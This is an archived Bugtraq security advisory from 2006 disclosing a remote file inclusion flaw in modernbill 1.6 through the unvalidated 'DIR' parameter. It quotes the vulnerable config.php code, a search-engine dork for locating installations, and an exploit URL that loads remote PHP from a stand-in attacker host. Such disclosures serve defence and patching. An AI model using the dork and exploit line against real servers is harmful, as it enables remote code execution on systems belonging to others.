Bugtraq mailing list archives
SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion
From: chris_hasibuan () yahoo com
Date: 3 Aug 2006 14:29:51 -0000
#############################SolpotCrew Community################################ # # modernbill ver 1.6 (DIR) Remote File Inclusion # # Download file : http://freshmeat.net/projects/modernbill/ # ################################################################################# # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (03-08-2006) # # contact: chris_hasibuan () yahoo com # # Website : http://www.solpotcrew.org/adv/solpot-adv-04.txt # ################################################################################ # # # Greetz: choi , cow_1seng , Ibnusina , Lappet_tutung , h4ntu , r4dja , # L0sTBoy , Matdhule , setiawan , barbarosa, NpR , Fungky , Blue|spy # home_edition2001 , Rendy ,Tje , m3lky , no-profile , bYu # and all crew #mardongan @ irc.dal.net # # ############################################################################### Input passed to the "DIR" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from include/html/config.php //include($DIR."include/misc/mod_sessions/session_functions.inc.php"); #session_set_save_handler("sess_mysql_open","","sess_mysql_read","sess_mysql_write","sess_mysql_destroy","sess_mysql_gc"); //session_start(); session_register("set_language"); session_register("v"); $new_language = ($set_language) ? $set_language : NULL ; $signup_form = TRUE; include_once($DIR."include/functions.inc.php"); ## ------------------------------------------------------ ## DO NOT CHANGE STOP ## ------------------------------------------------------ google dork : allinurl:/modernbill/ exploit: http://somehost/modernbill/include/html/config.php?DIR=http://evilcode ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F##################################
Current thread:
- SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion chris_hasibuan (Aug 03)
- Re: SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion Mailinglists Address (Aug 07)